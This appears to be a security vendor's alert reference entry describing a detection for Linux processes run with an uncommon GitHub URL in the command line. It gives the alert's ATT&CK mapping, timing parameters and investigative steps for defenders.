Linux process execution with a rare GitHub URL

Cortex XDR Analytics Alert Reference by data source

Product
Cortex XDR
Last date published
2025-01-19
Category
Analytics Alert Reference
Index by
data source

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

3 Hours

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

ATT&CK Tactic

Execution (TA0002)

ATT&CK Technique

Command and Scripting Interpreter (T1059)

Severity

Informational

Description

A process was executed with an uncommon GitHub URL in its command line. This may have legitimate uses, but it might also be used by attackers to download malicious payloads.

Attacker's Goals

Download a second stage payload for execution.

Investigative actions

  • Check if the initiator process is malicious.
  • Check the user activity on the same agent at that time.
  • Check if the host is a development server.
  • Check if this installation was related to more installations at the same time.
  • Check for additional file/network operations by the same process instance.